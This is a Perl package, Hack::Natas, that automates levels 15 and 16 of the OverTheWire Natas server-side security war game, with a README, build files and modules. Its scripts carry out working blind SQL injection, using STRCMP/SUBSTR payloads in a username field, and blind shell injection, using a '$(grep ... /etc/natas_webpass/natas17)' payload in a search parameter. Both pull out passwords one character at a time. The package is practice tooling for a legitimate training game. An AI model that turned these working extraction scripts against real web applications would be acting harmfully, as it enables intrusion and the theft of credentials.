README
NAME
    Hack::Natas - solve some of the Natas server-side security war games

VERSION
    version 0.002

DESCRIPTION
    overthewire.org <http://www.overthewire.org/wargames/> has a series of
    war games. Natas is the server-side security challenge.

    This package contains some scripts to automate solving some of the
    tedious levels, and documents walking you through all levels up to #17.

    This role provides the basic attributes and methods which are generally
    required for scripting password extraction.

METHODS
  get
    This sets the query string of the "uri" according to the key-value pairs
    passed in. Then, does an HTTP GET for that resource, and returns the
    response (a hashref).

  run
    The implementation of "run" must be provided by the consuming class.

    Before "run" executes, turn on autoflush for STDOUT.

    After run executes, print out the final password.

ATTRIBUTES
    *   level - a read-only integer for the current level

    *   http_user - the username to use to access the current level. By
        default, "natas${level}"

    *   http_pass - the password to use to access the current level.
        Required.

    *   uri - the URI for the current level. Can be coerced from a string.
        By default, this is constructed from the level, http_user, and
        http_pass.

    *   ua - an HTTP::Tiny object. By default, the timeout is 5s, and the
        "Host" header is set.

    *   password - the password we are extracting to access the next level.

    *   password_length - the length of the password. This is built by the
        "get_password_length" method.

SEE ALSO
    *   natas15

        Level 15 requires you to do blind SQL injection.

    *   natas16

        Level 16 requires you to do blind shell injection.

    *   <https://hashbang.ca/tag/natas>

    *   <http://overthewire.org>

AVAILABILITY
    The project homepage is <https://hashbang.ca/tag/natas>.

    The latest version of this module is available from the Comprehensive
    Perl Archive Network (CPAN). Visit <http://www.perl.com/CPAN/> to find a
    CPAN site near you, or see <https://metacpan.org/module/Hack::Natas/>.

SOURCE
    The development version is on github at
    <http://github.com/doherty/Hack-Natas> and may be cloned from
    <git://github.com/doherty/Hack-Natas.git>

BUGS AND LIMITATIONS
    You can make new bug reports, and view existing ones, through the web
    interface at <https://github.com/doherty/Hack-Natas/issues>.

AUTHOR
    Mike Doherty <doherty@cpan.org>

COPYRIGHT AND LICENSE
    This software is copyright (c) 2013 by Mike Doherty.

    This is free software; you can redistribute it and/or modify it under
    the same terms as the Perl 5 programming language system itself.



Changes
Revision history for Perl module {{$dist->name}}

{{$NEXT}}

0.003     2013-08-19
  - Prompt interactively for the password
  - Bump Moo dependency to 1.003000 to allow composing
    roles that require methods provided by the other (RT#82711)

0.002     2013-08-17
  - Rewrite to hopefully be more flexible for future levels
  - Use Moo roles to factor out common code
  - Rename to Hack::Natas, to give a hint to its purpose

0.001     2013-08-12
  - First released version


Build.PL

use strict;
use warnings;

use Module::Build 0.3601;


my %module_build_args = (
  "build_requires" => {
    "Module::Build" => "0.3601"
  },
  "configure_requires" => {
    "File::ShareDir::Install" => "0.03",
    "Module::Build" => "0.3601"
  },
  "dist_abstract" => "solve some of the Natas server-side security war games",
  "dist_author" => [
    "Mike Doherty <doherty\@cpan.org>"
  ],
  "dist_name" => "Hack-Natas",
  "dist_version" => "0.002",
  "license" => "perl",
  "module_name" => "Hack::Natas",
  "recommends" => {},
  "recursive_test_files" => 1,
  "requires" => {
    "Carp" => 0,
    "Data::Dumper" => 0,
    "Getopt::Long" => 0,
    "HTTP::Tiny" => "0.034",
    "Moo" => 0,
    "Moo::Role" => 0,
    "Term::ReadPassword" => 0,
    "Type::Utils" => 0,
    "Types::Standard" => 0,
    "URI" => 0,
    "perl" => "v5.16.0",
    "strict" => 0,
    "warnings" => 0
  },
  "script_files" => [
    "bin/natas16",
    "bin/natas15"
  ],
  "share_dir" => {
    "dist" => "walkthrough"
  },
  "test_requires" => {
    "Capture::Tiny" => 0,
    "Test::More" => "0.88",
    "Test::Script" => "1.05",
    "blib" => 0
  }
);


unless ( eval { Module::Build->VERSION(0.4004) } ) {
  my $tr = delete $module_build_args{test_requires};
  my $br = $module_build_args{build_requires};
  for my $mod ( keys %$tr ) {
    if ( exists $br->{$mod} ) {
      $br->{$mod} = $tr->{$mod} if $tr->{$mod} > $br->{$mod};
    }
    else {
      $br->{$mod} = $tr->{$mod};
    }
  }
}

my $build = Module::Build->new(%module_build_args);

$build->create_build_script;


lib/Hack/Natas.pm
package Hack::Natas;
use strict;
use warnings;
use v5.16.0;
# VERSION
# ABSTRACT: solve some of the Natas server-side security war games

use Carp qw/ confess /;
use URI;
use HTTP::Tiny 0.034;
use Types::Standard qw(Int Str);
use Type::Utils qw(class_type);
use Moo::Role;
requires qw(run get_password_length);

=head1 DESCRIPTION

L<overthewire.org|http://www.overthewire.org/wargames/> has a series of war games.
Natas is the server-side security challenge.

This package contains some scripts to automate solving some of the tedious levels,
and documents walking you through all levels up to #17.

This role provides the basic attributes and methods which are generally
required for scripting password extraction.

=head1 ATTRIBUTES

=over 4

=item * level - a read-only integer for the current level

=item * http_user - the username to use to access the current level. By default, "natas${level}"

=item * http_pass - the password to use to access the current level. Required.

=item * uri - the L<URI> for the current level. Can be coerced from a string. By default,
this is constructed from the level, http_user, and http_pass.

=item * ua - an L<HTTP::Tiny> object. By default, the timeout is 5s, and the C<Host> header is set.

=item * password - the password we are extracting to access the next level.

=item * password_length - the length of the password. This is built by the C<get_password_length> method.

=back

=cut

has level     => ( is => 'ro', isa => Int, required => 1);
has http_user => ( is => 'ro', lazy => 1, isa => Str, default => sub { 'natas' . $_[0]->level } );
has http_pass => ( is => 'ro', lazy => 1, isa => Str, required => 1 );
my $uri_type = class_type({ class => 'URI' })->plus_constructors( Str, 'new' );
has uri     => (
    is      => 'ro',
    lazy    => 1,
    isa     => $uri_type,
    coerce  => $uri_type->coercion,
    default => sub {
        my $self = shift;
        return sprintf 'http://%s:%s@natas%s.natas.labs.overthewire.org',
            $self->http_user, $self->http_pass, $self->level
    },
    handles => { set_query => 'query_form' },
);
has ua      => (
    is      => 'ro',
    lazy    => 1,
    isa     => class_type({class => 'HTTP::Tiny'}),
    default => sub {
        return HTTP::Tiny->new(
            timeout => 5,
            default_headers =>  { Host => $_[0]->http_user . '.natas.labs.overthewire.org' },
        );
    },
);
has password => ( is => 'rw', isa => Str );
has password_length => (is => 'rw', isa => Int, builder => 'get_password_length');

=head1 METHODS

=head2 get

This sets the query string of the C<uri> according to the key-value pairs
passed in. Then, does an HTTP GET for that resource, and returns the
response (a hashref).

=cut

sub get {
    my $self = shift;
    $self->set_query( { @_ } ) if @_;
    return $self->ua->get( $self->uri );
}

=head2 run

The implementation of C<run> must be provided by the consuming class.

Before C<run> executes, turn on autoflush for STDOUT.

After B<run> executes, print out the final password.

=cut

before run => sub { STDOUT->autoflush(1) };
after  run => sub { printf "\rPassword is '%s'.\n", $_[0]->password };

1;

=head1 SEE ALSO

=over 4

=item * L<natas15>

Level 15 requires you to do blind SQL injection.

=item * L<natas16>

Level 16 requires you to do blind shell injection.

=item * L<https://hashbang.ca/tag/natas>

=item * L<http://overthewire.org>

=back


scripts/natas15.pl
#!/usr/bin/perl
use strict;
use warnings;
use v5.16.3;

use Carp qw/ confess /;
use URI;
use HTTP::Tiny 0.034;
use Getopt::Long;

my $opts = { wrong => 0 };
GetOptions( $opts, 'wrong!' );

my $host = 'natas15.natas.labs.overthewire.org';
my $uri  = URI->new(sprintf q{http://%s:%s@%s/index.php}, 'natas15', $ARGV[0], $host);
my $u = HTTP::Tiny->new(
    timeout => 5,
    default_headers => { Host => $host },
);

my $password_so_far = '';
local $SIG{INT} = sub { print "\rPassword so far is: $password_so_far\n"; exit; };

sub response_to_boolean {
    my $r = shift;

    if (!$r->{success}) {
        use Data::Dumper;
        confess Dumper {
            response => $r,
            password_so_far => $password_so_far,
        };
    }
    elsif ($r->{content} =~ m/\QThis user exists/) {
        return 1;
    }
    elsif ($r->{content} =~ m/\QThis user doesn't exist/) {
        return;
    }
    else {
        use Data::Dumper;
        confess Dumper {
            response => $r,
            password_so_far => $password_so_far,
        };
    }
}
sub guess_length {
    my $sql_fragment = q{natas16" and length(password) = %d #};

    LENGTH:
    foreach my $i (30..33) {
        $uri->query_form({ debug => 1, username => sprintf($sql_fragment, $i) });
        if ( response_to_boolean( $u->get($uri) ) ) {
            return $i;
        }
        else {
            next LENGTH;
        }
    }
    confess "Couldn't determine length";
}

sub guess_next_char {
    my $pos = shift;
    my $sql_fragment = sub {
        my $sql;
        if ($opts->{wrong}) {
            $sql = <<'WRONG_SQL';
natas16" and STRCMP(
    SUBSTR(password, %d, 1),
    '%s') = 0 #
WRONG_SQL
        }
        else {
            $sql = <<'RIGHT_SQL';
natas16" and STRCMP(
    BINARY(SUBSTR(password, %d, 1)),
    BINARY('%s')) = 0 #
RIGHT_SQL
        }
        chomp $sql;
        return $sql;
    }->();

    CHAR:
    foreach my $char ('a'..'z', 'A'..'Z', 0..9) {
        print "\rGuessing: ${password_so_far}${char}";
        $uri->query_form({ debug => 1, username => sprintf($sql_fragment, $pos, $char) });

        if (response_to_boolean($u->get($uri))) {
            return $char;
        }
        else {
            next CHAR;
        }
    }
    confess "Couldn't guess the next char; password so far is '$password_so_far'";
}

my $length = guess_length();
say "Password length is $length";
foreach my $pos (1 .. $length) {
    STDOUT->autoflush(1);
    $password_so_far .= guess_next_char( $pos );
}

say "\rPassword is '$password_so_far'; double-checking correctness...";

my $sql_fragment = <<'END_SQL_FRAGMENT';
natas16" and STRCMP(BINARY(password), BINARY('%s')) = 0 #
END_SQL_FRAGMENT
chomp($sql_fragment);
$uri->query_form({ debug => 1, username => sprintf($sql_fragment, $password_so_far) });
say response_to_boolean( $u->get($uri) )
    ? "Looks correct"
    : "Looks incorrect, actually";


scripts/natas16.pl
#!/usr/bin/env perl
use strict;
use warnings;
use v5.16.3;

use Carp qw/ confess /;
use URI;
use HTTP::Tiny 0.034;

my $host = 'natas16.natas.labs.overthewire.org';
my $uri  = URI->new(sprintf q{http://%s:%s@%s/index.php}, 'natas16', $ARGV[0], $host);
my $u = HTTP::Tiny->new(
    timeout => 5,
    default_headers => { Host => $host },
);

my $inject = '$(grep -E ^%s /etc/natas_webpass/natas17)hacker';
my $pw_so_far = '';
local $SIG{INT} = sub { print "\rPassword so far is: $pw_so_far\n"; exit; };

sub response_to_boolean {
    my $r = shift;

    if (!$r->{success}) {
        use Data::Dumper;
        confess Dumper $r;
    }
    elsif ($r->{content} =~ m/^hacker$/m) {
        return 0;
    }
    else {
        return 1;
    }

}
sub guess_next_char {
    CHAR:
    foreach my $char ('a'..'z', 'A'..'Z', 0..9) {
        print "\rGuessing ${pw_so_far}${char}";
        $uri->query_form({ needle => sprintf($inject, $pw_so_far . $char) });

        my $r = $u->get($uri);
        if ( response_to_boolean($r) ) {
            return $char;
        }
        else {
            next CHAR;
        }
    }
    confess "Couldn't guess next char; password so far is $pw_so_far";
}

STDOUT->autoflush(1);
foreach my $pos (0..31) {
    $pw_so_far .= guess_next_char();
}

say "\rPassword is $pw_so_far";


lib/Hack/Natas/15.pm
package Hack::Natas::15;
use strict;
use warnings;
use v5.16.0;
# VERSION
# ABSTRACT: solve level 15 of the Natas server-side security war games

use Carp qw(confess);
use Moo 1.003000; # RT#82711
with qw(Hack::Natas Hack::Natas::IncrementalSearch);

=head1 DESCRIPTION

This class will solve level 15.

=for Pod::Coverage BUILDARGS

=cut

sub BUILDARGS {
    my %args  = @_[1..$#_];
    return { level => 15, http_pass => $args{http_pass} };
}

=head1 METHODS

=head2 response_to_boolean

Does an HTTP GET of the resource described by the key-value
pairs, and parses the response. If it contains the string
C<This user exists>, then return true; if it contains
C<This user doesn't exist>, then return false.

=cut

sub response_to_boolean {
    my $self = shift;
    my $res  = $self->get( @_ );

    if (!$res->{success}) {
        require Data::Dumper;
        confess Data::Dumper::Dumper({
            response => $res,
            password_so_far => $self->password_so_far,
        });
    }
    elsif ($res->{content} =~ m/\QThis user exists/) {
        return 1;
    }
    elsif ($res->{content} =~ m/\QThis user doesn't exist/) {
        return;
    }
    else {
        require Data::Dumper;
        confess Data::Dumper::Dumper({
            response => $res,
            password_so_far => $self->password_so_far,
        });
    }
}

=head2 get_password_length

Although we suspect that the password is 32 characters long, we can
verify our assumption with an SQL injection. This does a search for
the password length (which ends up being 32, so I have restricted the
search space to avoid wasting time).

=cut

sub get_password_length {
    my $self = shift;
    my $sql_fragment = q{natas16" and length(password) = %d #};

    LENGTH:
    foreach my $i (31..33) {
        print "\rGuessing length: $i";
        if ( $self->response_to_boolean(
            debug => 1,
            username => sprintf($sql_fragment, $i)
        ) ) {
            say "\rPassword length is $i";
            return $i;
        }
        else {
            next LENGTH;
        }
    }
    confess "Couldn't determine length (maxed out at 33)";
}

=head2 guess_next_char

Given the current position in the password, guesses the next
character by iterating through the alphabet doing a
case-insensitive search. If a letter matches, then do a single
case-sensitive search to verify the case. Returns the found
character.

=cut

sub guess_next_char {
    my $self = shift;
    my $pos  = shift;
    my %sql  = (
        cmp  => <<'SQL_FRAGMENT',
natas16" and STRCMP(
    SUBSTR(password, %d, 1),
    '%s') = 0 #
SQL_FRAGMENT
        cmp_bin => <<'SQL_FRAGMENT',
natas16" and STRCMP(
    BINARY(SUBSTR(password, %d, 1)),
    BINARY('%s')) = 0 #
SQL_FRAGMENT
    );
    chomp for values %sql;

    NUM:
    foreach my $num (0..9) {
        printf "\rGuessing: %s%s", $self->password_so_far, $num;
        return $num if $self->response_to_boolean(
            debug => 1,
            username => sprintf($sql{cmp}, $pos, "$num"),
        );
    }

    CHAR:
    foreach my $char ('a'..'z') {
        printf "\rGuessing: %s%s", $self->password_so_far, $char;

        if ($self->response_to_boolean(
            debug => 1,
            username => sprintf($sql{cmp}, $pos, $char),
        )) { # verify case
            return $self->response_to_boolean(
                debug => 1,
                username => sprintf($sql{cmp_bin}, $pos, uc $char),
            ) ? uc $char : $char;
        }
    }
    confess sprintf q/Couldn't guess the next char; password so far is '%s'/, $self->password_so_far;
}

=head2 run

Runs the typical search, as implemented by L<Hack::Natas::IncrementalSearch>,
but then verifies the whole password in a single shot, using a case-sensitive
comparison.

=cut

around run => sub {
    my $orig = shift;
    my $self = shift;
    $orig->($self, @_);

    printf "\rPassword is '%s'; double-checking correctness...\n", $self->password_so_far;

    my $sql_fragment = q/natas16" and STRCMP(BINARY(password), BINARY('%s')) = 0 #/;
    say $self->response_to_boolean(
        debug => 1,
        username => sprintf($sql_fragment, $self->password_so_far)
    )
        ? 'Looks correct'
        : 'Looks incorrect, actually';
};

1;


lib/Hack/Natas/16.pm
package Hack::Natas::16;
use strict;
use warnings;
use v5.16.0;
# VERSION
# ABSTRACT: solve level 16 of the Natas server-side security war games

use Carp qw(confess);
use Moo 1.003000; # RT#82711
with qw(Hack::Natas Hack::Natas::IncrementalSearch);

=head1 DESCRIPTION

This class will solve level 16.

=for Pod::Coverage BUILDARGS

=cut

sub BUILDARGS {
    my %args  = @_[1..$#_];
    return { level => 16, http_pass => $args{http_pass} };
}

=head1 METHODS

=head2 get_password_length

This level has a 32-character password.

=cut

sub get_password_length { 32 }

=head2 response_to_boolean

Does an HTTP GET of the resource described by the key-value
pairs, and then parses the response. If it contains the
string C<hacker>, then return false; otherwise, return true.

=cut

sub response_to_boolean {
    my $self = shift;
    my $res  = $self->get( @_ );

    if (!$res->{success}) {
        use Data::Dumper;
        confess Dumper $res;
    }
    elsif ($res->{content} =~ m/^hacker$/m) {
        return 0;
    }
    else {
        return 1;
    }

}

=head2 guess_next_char

Guesses the next character of the password being extracted. This
method ignores the current position into the password, as the
part of the password extracted thus far is sufficient to continue
the search.

=cut

sub guess_next_char {
    my $self = shift;
    my $inject = '$(grep -E ^%s /etc/natas_webpass/natas17)hacker';

    CHAR:
    foreach my $char ('a'..'z', 'A'..'Z', 0..9) {
        printf "\rGuessing: %s%s", $self->password_so_far, $char;

        if ( $self->response_to_boolean(needle => sprintf($inject, $self->password_so_far . $char)) ) {
            return $char;
        }
        else {
            next CHAR;
        }
    }
    confess sprintf q/Couldn't guess next char; password so far is %s/, $self->password_so_far;
}

1;


lib/Hack/Natas/IncrementalSearch.pm
package Hack::Natas::IncrementalSearch;
use strict;
use warnings;
use v5.16.0;
# VERSION
# ABSTRACT: do incremental searches for some Natas challenges

use Types::Standard qw(Int Str);
use Type::Utils qw(class_type);
use Moo::Role;
requires qw(
    password_length
    guess_next_char
    password
);

has password_so_far => (
    is      => 'rw',
    isa     => Str,
    default => sub { '' },
);

=head1 DESCRIPTION

This is a role for incrementally guessing the password in one-character
slices. It provides a C<password_so_far> attribute, which is used to
build up the full password. It requires that consumers have:

=over 4

=item * password_length

An integer which tells us how long the password is, so the search will stop
once we have the whole thing.

=item * guess_next_char

A method which, when called with the current position in the password, returns
the next character.

=back

=head1 METHODS

=head2 run

This is the only method you need to call. It will do the search, and once
C<password_length> characters of the password have been guessed using
C<guess_next_char>, the C<password> attribute will be set.

=cut

sub run {
    my $self = shift;

    foreach my $pos (1 .. $self->password_length) {
        $self->password_so_far( $self->password_so_far . $self->guess_next_char($pos) );
    }
    $self->password( $self->password_so_far );
}

1;


Makefile.PL

use strict;
use warnings;

use 5.016000;

use ExtUtils::MakeMaker 6.30;

use File::ShareDir::Install;
install_share dist => "walkthrough";


my %WriteMakefileArgs = (
  "ABSTRACT" => "solve some of the Natas server-side security war games",
  "AUTHOR" => "Mike Doherty <doherty\@cpan.org>",
  "BUILD_REQUIRES" => {
    "Module::Build" => "0.3601"
  },
  "CONFIGURE_REQUIRES" => {
    "File::ShareDir::Install" => "0.03",
    "Module::Build" => "0.3601"
  },
  "DISTNAME" => "Hack-Natas",
  "EXE_FILES" => [
    "bin/natas16",
    "bin/natas15"
  ],
  "LICENSE" => "perl",
  "NAME" => "Hack::Natas",
  "PREREQ_PM" => {
    "Carp" => 0,
    "Data::Dumper" => 0,
    "Getopt::Long" => 0,
    "HTTP::Tiny" => "0.034",
    "Moo" => 0,
    "Moo::Role" => 0,
    "Term::ReadPassword" => 0,
    "Type::Utils" => 0,
    "Types::Standard" => 0,
    "URI" => 0,
    "strict" => 0,
    "warnings" => 0
  },
  "TEST_REQUIRES" => {
    "Capture::Tiny" => 0,
    "Test::More" => "0.88",
    "Test::Script" => "1.05",
    "blib" => 0
  },
  "VERSION" => "0.002",
  "test" => {
    "TESTS" => "t/*.t"
  }
);


unless ( eval { ExtUtils::MakeMaker->VERSION(6.63_03) } ) {
  my $tr = delete $WriteMakefileArgs{TEST_REQUIRES};
  my $br = $WriteMakefileArgs{BUILD_REQUIRES};
  for my $mod ( keys %$tr ) {
    if ( exists $br->{$mod} ) {
      $br->{$mod} = $tr->{$mod} if $tr->{$mod} > $br->{$mod};
    }
    else {
      $br->{$mod} = $tr->{$mod};
    }
  }
}

unless ( eval { ExtUtils::MakeMaker->VERSION(6.56) } ) {
  my $br = delete $WriteMakefileArgs{BUILD_REQUIRES};
  my $pp = $WriteMakefileArgs{PREREQ_PM};
  for my $mod ( keys %$br ) {
    if ( exists $pp->{$mod} ) {
      $pp->{$mod} = $br->{$mod} if $br->{$mod} > $pp->{$mod};
    }
    else {
      $pp->{$mod} = $br->{$mod};
    }
  }
}

delete $WriteMakefileArgs{CONFIGURE_REQUIRES}
  unless eval { ExtUtils::MakeMaker->VERSION(6.52) };

WriteMakefile(%WriteMakefileArgs);

{
package
MY;
use File::ShareDir::Install qw(postamble);
}


